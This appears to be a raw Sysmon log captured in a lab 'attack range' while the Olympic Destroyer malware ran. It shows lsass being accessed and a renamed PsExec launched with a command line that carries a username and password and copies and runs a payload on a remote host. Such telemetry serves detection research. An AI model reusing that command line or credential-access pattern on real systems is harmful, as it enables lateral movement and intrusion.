Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-12FE-6216-D805-000000003802}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000291977Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.292{C8EA50B7-12FE-6216-D805-000000003802}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000291976Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.377{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291975Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.377{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291974Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.377{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291973Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.377{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291972Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.361{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12FE-6216-D905-000000003802}6616C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000291971Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.361{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=EFD54B055B513F25DBB5DAEFCF5AB075,SHA256=801594A726EDB9D8C7D6D3A1A4A9E05ADD009160E83BB8DC0150B09A82ED836E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291970Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.361{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291969Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.361{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291968Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.361{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291967Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.361{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291966Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.355{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{00000000-0000-0000-0000-000000000000}6616C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291965Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.356{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{C8EA50B7-12FE-6216-D905-000000003802}6616C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291964Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.355{C8EA50B7-12FE-6216-D905-000000003802}6616C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.22 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 534500x8000000000000000291963Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.336{C8EA50B7-12FD-6216-D405-000000003802}6484C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 534500x8000000000000000291962Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.320{C8EA50B7-12FD-6216-D305-000000003802}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291961Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.320{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FD-6216-D405-000000003802}6484C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291960Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.320{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FD-6216-D405-000000003802}6484C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291959Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.289{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FD-6216-D305-000000003802}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291958Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.289{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FD-6216-D305-000000003802}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291957Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:02.273{C8EA50B7-12FD-6216-D405-000000003802}6484C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 13241300x8000000000000000291956Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:02.235{C8EA50B7-12FD-6216-D305-000000003802}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 534500x8000000000000000291955Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.220{C8EA50B7-12FD-6216-D205-000000003802}6424C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291954Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.173{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12FD-6216-D205-000000003802}6424C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291953Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.173{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12FD-6216-D205-000000003802}6424C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291952Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.057{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12FD-6216-D705-000000003802}6696C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291951Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.057{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12FD-6216-D705-000000003802}6696C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291950Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:02.057{C8EA50B7-12FD-6216-D205-000000003802}6424C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291949Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.056{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12FD-6216-D605-000000003802}6576C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291948Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.056{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12FD-6216-D605-000000003802}6576C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291947Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 